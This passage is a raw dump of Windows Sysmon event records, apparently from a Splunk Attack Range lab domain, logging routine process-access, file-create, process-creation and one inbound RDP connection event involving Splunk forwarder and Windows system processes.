Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001049889Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:26.896{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2E7C5102A425FF4C3D1956D39D326A98,SHA256=6C60E9EB49F1A3F5006A726249E52C8934C3A21A8FFDC57CAD30D542FA8FBF5E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049888Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:26.596{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5CD0AE70DB3CAD676E6A1C35B3BA9DB2,SHA256=04B21455D7271263B9A2DA09ECB3E11E522821CC2FA5ABFB35C61122335B9085,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000978524Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:26.583{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8A82-6151-BA79-00000000FD01}2564C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978523Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:26.583{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978522Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:26.583{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978521Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:26.583{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978520Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:26.583{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978519Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:26.583{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978518Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:26.583{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978517Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:26.583{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978516Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:26.583{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978515Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:26.583{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978514Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:26.583{69CF5F33-7F27-614D-0500-00000000FD01}408524C:\Windows\system32\csrss.exe{69CF5F33-8A82-6151-BA79-00000000FD01}2564C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000978513Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:26.583{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8A82-6151-BA79-00000000FD01}2564C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000978512Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:26.568{69CF5F33-8A82-6151-BA79-00000000FD01}2564C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000978511Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:26.098{69CF5F33-8A81-6151-B979-00000000FD01}3676648C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000978510Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:23.066{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse212.102.34.245unn-212-102-34-245.datapacket.com44833-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 10341000x8000000000000000978554Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:27.958{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8A83-6151-BC79-00000000FD01}2784C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978553Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:27.958{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978552Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:27.958{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978551Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:27.958{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978550Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:27.958{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978549Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:27.942{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978548Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:27.942{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978547Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:27.942{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978546Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:27.942{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978545Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:27.942{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978544Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:27.942{69CF5F33-7F27-614D-0500-00000000FD01}408980C:\Windows\system32\csrss.exe{69CF5F33-8A83-6151-BC79-00000000FD01}2784C:\Program 